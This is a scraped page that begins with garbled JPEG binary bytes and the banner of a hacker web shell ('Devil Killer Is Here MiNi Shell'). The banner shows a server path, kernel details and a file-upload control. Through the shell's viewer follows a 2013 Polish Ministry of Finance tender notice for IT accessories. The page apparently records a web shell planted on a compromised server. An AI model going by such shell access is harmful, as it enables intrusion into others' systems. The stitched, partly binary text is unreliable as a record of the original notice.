JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130812/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130812/324448-N-2013.html

<p class="kh_header"><b>Warszawa: Zakup akcesoriów informatycznych</b><br>
<b>Numer ogłoszenia: 324448 - 2013; data zamieszczenia: 12.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ministerstwo Finansów, Departament Finansów Resortu, FR4 , ul. Świętokrzyska 12, 00-916 Warszawa, woj. mazowieckie, tel. 22 694 33 00, faks 22 694 52 68.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup akcesoriów informatycznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sprzedaż i dostawa do siedziby Zamawiającego wraz z rozładunkiem i
przemieszczeniem do miejsc wskazanych przez Zamawiającego akcesoriów informatycznych i
materiałów eksploatacyjnych: 1. Dostawa zewnętrznych przenośnych dysków twardych 2,5 1TB 2.
Dostawa pamięci przenośnych flash 32 GB 3. Dostawa płyt CD-R 4. Dostawa płyt DVD-R 5.Dostawa baterii do notebooka Fujitsu p701 6. Dostawa przedłużaczy USB 1m 7. Dostawa przenośnych
urządzeń konferencyjnych 8. Dostawa kamer internetowych USB 9. Dostawa projektorów
multimedialnych HD LED 10. Dostawa projektorów multimedialnych 11. Dostawa kieszonkowych
projektorów multimedialnych LED 12. Dostawa myszy USB laserowych 13. Dostawa kaset ze
zszywkami do drukarki HP M2727nf 14. Dostawa dysków twardych 2TB 15. Dostawa toreb do
laptopów 12 16. Dostawa toreb do laptopów 13,3-14,1 17. Dostawa breloków zbliżeniowych
Mifare 18. Dostawa czytników Mifare USB keyboard enabled 13,56 MHz 19. Dostawa czytników legc
USB keyboard enabled 13,56 MHz 20. Dostawa tablic interaktywnych. Szczegółowy wykaz
akcesoriów i materiałów eksploatacyjnych podany jest w Załączniku Nr 4..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.23.00.00-0.</p>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca przystępujący do licytacji elektronicznej jest obowiązany wnieść wadium w wysokości:
5 000,00 zł (słownie: pięć tysięcy złotych). 2. Wadium może być wnoszone w jednej lub kilku
następujących formach: 1) w pieniądzu, 2) poręczeniach bankowych lub poręczeniach
spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy musi być poręczeniem
pieniężnym, 3) gwarancjach bankowych, 4) gwarancjach ubezpieczeniowych, 5) poręczeniach
udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r.
o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 z późn.
zm.). 3. Wniesione wadium musi obejmować okres związania ofertą i nie może zawierać żadnych
ograniczeń sprzecznych z ustawą Prawo zamówień publicznych, w szczególności ograniczających
możliwość zrealizowania praw określonych w art. 46 ust. 4a i 5 Ustawy. 4. Wadium wniesione w
pieniądzu musi być przelane na rachunek bankowy Ministerstwa Finansów: NBP 29-1010-1010-0038-1213-9120-0000 z dopiskiem Wadium - Zakup akcesoriów informatycznych.
5. Potwierdzenie wniesienia wadium należy dołączyć do oferty. Wymagane jest doręczenie oryginału
dokumentu, a w przypadku wpłaty pieniężnej - kopii dowodu wykonanej operacji. 6. W przypadku
wniesienia wadium w formie pieniężnej, Wykonawca z zachowaniem właściwej staranności winien
dokonać przelewu pieniężnego z odpowiednim wyprzedzeniem, gdyż wniesienie wadium jest
skuteczne z chwilą uznania rachunku bankowego Zamawiającego.7. Zamawiający zwróci wadium
wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej zgodnie z treścią art. 46
ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek,wiedzy i doświadczenia zgodnie z przepisem § 1 ust. 4 rozporządzenia Prezesa Rady
Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający
od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. poz. 231) zostanie
uznany za spełniony, gdy Wykonawca wskaże w wykazie oraz złoży poświadczenia na wykonanie, a
w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w ciągu ostatnich 3 lat
licząc od dnia złożenia oferty, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co
najmniej 2 dostaw, polegających na dostawie akcesoriów komputerowych lub materiałów
eksploatacyjnych o wartości co najmniej 40 000,00 zł brutto każda z podaniem ich wartości, dat
wykonania i odbiorców wraz z załączeniem dokumentów potwierdzających, że wymienione dostawy
zostały wykonane należycie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek sytuacji ekonomicznej zostanie uznany za spełniony, gdy Wykonawca wykaże się
posiadaniem środków lub zdolności kredytowej w wysokości nie mniejszej niż 50 000 zł. (pięćdziesiąt
tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> licytacja elektroniczna.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany i uzupełnienia niniejszej Umowy wymagają formy pisemnej pod rygorem
nieważności. 2. Zmiany Umowy nie stanowi w szczególności zmiana nazw/firm Stron, siedziby Stron,
numerów kont bankowych Stron, jak również osób odpowiedzialnych za realizację Przedmiotu
Umowy ze strony Wykonawcy oraz przedstawicieli Zamawiającego. 3. Zamawiający przewiduje
możliwość zmian postanowień niniejszej Umowy w przypadkach, gdy: 3.1. nastąpi zmiana
powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację Przedmiotu
Umowy, chyba że zmiana taka znana była w chwili składania oferty; 3.2. niezbędna jest zmiana
sposobu wykonania zobowiązania, o ile zmiana taka jest korzystna dla Zamawiającego, z wyjątkiem
sytuacji, gdy zmiana ta ingeruje w treść oferty lub jest istotna, lub o ile zmiana taka jest konieczna w
celu prawidłowego wykonania Przedmiotu Umowy; 3.3. niezbędna jest zmiana Terminu realizacji
Umowy w przypadku zaistnienia okoliczności lub zdarzeń uniemożliwiających realizację Umowy w
wyznaczonym terminie, na które strony nie miały wpływu; 3.4. po zawarciu Umowy, gdy doszło do
wydłużenia okresu gwarancyjnego przez producenta; 3.5. w zakresie zmniejszenia wynagrodzenia
Wykonawcy i zasad płatności tego wynagrodzenia w sytuacji, gdy konieczność wprowadzenia zmian
wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia Umowy, lub zmiany te
są korzystne dla Zamawiającego, w szczególności w przypadku zmniejszenia zakresu Przedmiotu
Umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>

<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.4.6) Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:</b> https://licytacje.uzp.gov.pl</p>
<p><b>IV.4.7) Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:</b> www.mf.gov.pl</p>
<p><b>IV.4.8) Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:</b> 1. Wymagania formalne: a) - z Platformy w pełnym zakresie mogą korzystać wyłącznie Wykonawcy
zarejestrowani w systemie pod adresem https://licytacje.uzp.gov.pl. Wykonawca powinien dokonać
rejestracji przed wysłaniem Wniosku o dopuszczenie do udziału w licytacji ; b) - Wykonawca, aby
umożliwić Zamawiającemu dopuszczenie go do udziału w licytacji, rejestruje się w systemie
dostępnym na stronie https://licytacje.uzp.gov.pl. W terminie wskazanym przez Zamawiającego,
Wykonawca składając Wniosek o dopuszczenie go do udziału w licytacji podaje swój login; c) - w
przypadku podania przez Wykonawcę niewłaściwego loginu bądź nie przekazania go Zamawiającemu
wraz z Wnioskiem o dopuszczenie go do udziału w licytacji, Wykonawca zobowiązany jest do jego
przekazania najpóźniej na dwa dni przed terminem otwarcia licytacji (login należy podać dokładnie
stosując te same znaki, w tym duże i małe litery, jeśli takie umieszczono przy rejestracji); d) - brak
loginu lub brak poprawnego loginu będzie skutkowało brakiem możliwości wzięcia udziału
Wykonawcy w licytacji; 2. Pomoc w rejestracji i odpowiedzi na ewentualne problemy znajdują się na
stronie https://licytacje.uzp.gov.pl, w zakładce SAMOUCZEK; 3.Wymagania techniczne: komputer
klasy PC z systemem operacyjnym Windows/Linux oraz przeglądarka internetowa Internet Explorer
6.0 lub wyższa lub Firefox 2.0 lub wyższa. 3. Przedmiotowa licytacja jest licytacją jednoetapową; 4.
Od Wykonawców chcących wziąć udział w przedmiotowej licytacji nie jest wymagany podpis
elektroniczny; 5 Zamawiający dopuści do udziału w licytacji elektronicznej i zaprosi do składania
ofert wszystkich Wykonawców, którzy spełnią warunki udziału w postępowaniu. Zaproszenie do
udziału w licytacji zostanie wysłane faksem lub drogą elektroniczną na adres e-mail wskazany we
wniosku o dopuszczenie do udziału w licytacji elektronicznej.</p>
<p><b>IV.4.9) Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:</b> W toku licytacji elektronicznej Wykonawcy składają kolejne, korzystniejsze postąpienia. Możliwość
złożenia postąpienia istnieje od otwarcia licytacji do jej zamknięcia; 2.Oferta złożona w toku licytacji
przestaje wiązać, gdy Wykonawca złożył ofertę korzystniejszą; 3. W toku licytacji Wykonawcy
proponują cenę oferty brutto wyrażoną w złotych. Zaproponowana cena obejmuje wszystkie koszty i
składniki związane z wykonaniem zamówienia oraz warunkami stawianymi przez Zamawiającego, w
tym należny podatek VAT. Zamawiający nie zapewnia zwolnienia Wykonawcy z żadnych podatków,
opłat, ani nie będzie zwracał żadnych kar należnych z jakiegokolwiek tytułu, czynności, usług,
świadczeń, opłat, ceł, podatków itp., których nie przewidziano w ogłoszeniu. Ryzyko konieczności
wykonania wszelkich prac towarzyszących, mogących pojawić się w trakcie realizacji zamówienia,
ryzyko związane ze zmianami kursów walut, ceł itp., obciąża Wykonawcę i należy uwzględnić je w
ofercie; 4. Oferta złożona przez Wykonawcę musi być niższa od oferty najkorzystniejszej, co najmniej
o kwotę minimalnego postąpienia. System umożliwia składanie wyłącznie postąpień o cenie niższej
niż oferta wiodąca w danym momencie Wykonawca nie może cofnąć raz złożonej oferty. Sposób
podawania kwoty - kwota określana jest w złotych oraz groszach (jeżeli występują grosze, wpisujemy
je po kropce, np.: 102.50 obowiązuje dokładność do dwóch miejsc po kropce). Użytkownicy ponoszą
odpowiedzialność za informacje wprowadzone do systemu i konsekwencje z tego wynikające; 5. W
trakcie licytacji elektronicznej system aukcyjny na bieżąco udostępnia wszystkim Wykonawcom
informacje o pozycji złożonych przez nich ofert, liczbie Wykonawców biorących udział w tej licytacji, a
także cenach złożonych przez nich ofert. W celu zapewnienia aktualności listy postąpień niezbędne
będzie samodzielne odświeżanie ekranu przy użyciu przycisku przeglądarki internetowej - system nie
dokonuje odświeżania automatycznie. Do momentu zamknięcia licytacji Zamawiający nie ujawnia
informacji umożliwiających identyfikację Wykonawców; 6. W trakcie licytacji obowiązuje czas podawany na stronie Platformy licytacji elektronicznych UZP;7 Zamawiający udzieli zamówienia
Wykonawcy, który zaoferuje najniższą cenę brutto za wykonanie całego zamówienia; 8. Licytacja
elektroniczna rozpoczyna się od ceny wywoławczej 466 600.00 zł..</p>
<p><b>IV.4.10) Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:</b><br>
<ul class="kh_indent_1"><li><table><tr><td style="font-size: 10pt;"><b>Licytacja jednoetapowa </b>          </td><td></td><td style="font-size: 10pt;"><b>czas trwania:</b> 20 minut</td></tr>
</table></li></ul>

<p><b>IV.4.11) Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:</b> 20.08.2013 godzina 12:00, miejsce: Ministerstwo Finansów, 00-916 Warszawa, ul. Świętokrzyska 12, Departament Finansów Resortu,
pok. 1326, tel. 22 694 48 04.</p>
<p><b>IV.4.12) Termin otwarcia licytacji elektronicznej:</b> 5 dni po terminie przekazania zaproszeń, o godzinie 10:00..</p>
<p><b>IV.4.13) Termin i warunki zamknięcia licytacji elektronicznej </b><i>(jeżeli dotyczy):</i></p>
<p>Upływa w dniu otwarcia, o godzinie 10:20</p>
<p><b>IV.4.14 Wymagania dotyczące zabezpieczenia należytego wykonania umowy </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>1. Wykonawca, którego oferta zostanie wybrana, zobowiązany jest przed zawarciem Umowy do
wniesienia zabezpieczenia należytego wykonania Umowy w wysokości 10 % wartości Umowy, o
której mowa w § 6 ust. 1 Wzoru Umowy, zaokrąglonej w dół do pełnych tysięcy złotych. Kwota
stanowiąca 70% wartości całości zabezpieczenia zostanie zwolniona w ciągu 30 dni od daty
wykonania przez Wykonawcę całości przedmiotu Umowy bez zastrzeżeń. Pozostała kwota zostanie
zwolniona stosownie do art. 151 ust. 3 Ustawy Pzp. 2. Zabezpieczenie może być wnoszone w jednej
lub kilku następujących formach: w pieniądzu, poręczeniach lub gwarancjach bankowych,
poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej (z tym, że zobowiązanie kasy jest
zawsze zobowiązaniem pieniężnym) gwarancjach ubezpieczeniowych lub poręczeniach udzielanych
przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy o utworzeniu Polskiej Agencji Rozwoju
Przedsiębiorczości. 3. Zamawiający nie wyraża zgody na wniesienie zabezpieczenia w wekslach z
poręczeniem wekslowym banku lub spółdzielczej kasy oszczędnościowo-kredytowej, przez
ustanowienie zastawu na papierach wartościowych emitowanych przez Skarb Państwa lub jednostkę
samorządu terytorialnego oraz przez ustanowienie zastawu rejestrowego na zasadach określonych w
przepisach o zastawie rejestrowym i rejestrze zastawów.</p>
<p><b>IV.4.15 Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>Wzór Umowy stanowiący Załącznik Nr 5 jest zamieszczony na stronie internetowej zamawiającego,
adres: www.mf.gov.pl</p>
<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wykonawca ma prawo złożyć tylko jeden Wniosek o dopuszczenie do udziału w licytacji
elektronicznej. Złożenie większej ilości wniosków spowoduje odrzucenie wszystkich wniosków
złożonych przez danego Wykonawcę. Wniosek oraz wszelkie dokumenty wymagane muszą zostać
sporządzone w języku polskim z zachowaniem formy pisemnej. 1. Załącznik Nr 1 - Wniosek o
dopuszczenie do udziału w licytacji elektronicznej należy złożyć w zamkniętej kopercie z wyraźnie
oznaczonym napisem - ZAKUP AKCESORIÓW INFORMATYCZNYCH, wraz z Załącznikiem Nr 2 -
Oświadczenie Wykonawcy oraz Załącznikiem Nr 3 - Wykaz wykonanych głównych dostaw.
Szczegółowy opis przedmiotu zamówienia podany jest w Załączniku Nr 4. Wzór umowy zamieszczony
jest w Załączniku Nr 5. Wykonawca może złożyć Wniosek o dopuszczenie do udziału w licytacji
elektronicznej oraz inne wymagane oświadczenia na formularzach sporządzonych przez siebie pod
warunkiem, że ich treść odpowiadać będzie co najmniej treści formularzy sporządzonych przez
Zamawiającego i nie będzie z nią sprzeczna; 2. Wniosek o dopuszczenie do udziału w licytacji
elektronicznej oraz wymagane oświadczenia należy opieczętować /pieczęć powinna zawierać co najmniej nazwę i adres Wykonawcy/ oraz opatrzyć własnoręcznym podpisem Wykonawcy, w
przypadku nieczytelnego podpisu należy opatrzyć go pieczątką imienną zawierającą co najmniej
imię i nazwisko osoby składającej podpis. Wniosek o dopuszczenie do udziału w licytacji
elektronicznej oraz wymagane oświadczenia muszą być podpisane przez osobę lub osoby
upoważnione do reprezentowania Wykonawcy /wskazane we właściwym dla Wykonawcy rejestrze
lub ewidencji działalności gospodarczej/. W przypadku podpisania ww. dokumentów przez
pełnomocnika należy dołączyć do oferty pełnomocnictwo do podpisania oferty; 3. Wnioski złożone
po terminie nie będą rozpatrywane i zostaną niezwłocznie zwrócone Wykonawcy; 4. Wszystkie
załączniki dostępne są na stronie Zamawiającego pod adresem: www.mf.gov.pl; 5. Uprawnieni do
porozumiewania się z wykonawcami: Przemysław Dobrowolski- tel. 22 694-48-04, fax 22 694-52-68,
e-mail: wzp@mofnet.gov.pl; ; 6. Adres do korespondencji: Ministerstwo Finansów Departament
Finansów Resortu ul. Świętokrzyska 12, 00-916 Warszawa; 7. Wszystkie pytania dotyczące
wyjaśnienia treści ogłoszenia o zamówieniu należy kierować w formie faksu lub e-mailem do osoby
uprawnionej do bezpośredniego kontaktu z Wykonawcami (z podaniem nazwy postępowania); 8.
Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawca przekazują faxem
lub e- mailem; 9. Zamawiający i Wykonawcy od momentu otwarcia do momentu zamknięcia licytacji
przekazują wnioski, oświadczenia i inne informacje drogą elektroniczną; 10. Nie przewiduje się
zwołania zebrania Wykonawców; 11. Bezpośrednio po zakończeniu licytacji na stronie Platformy
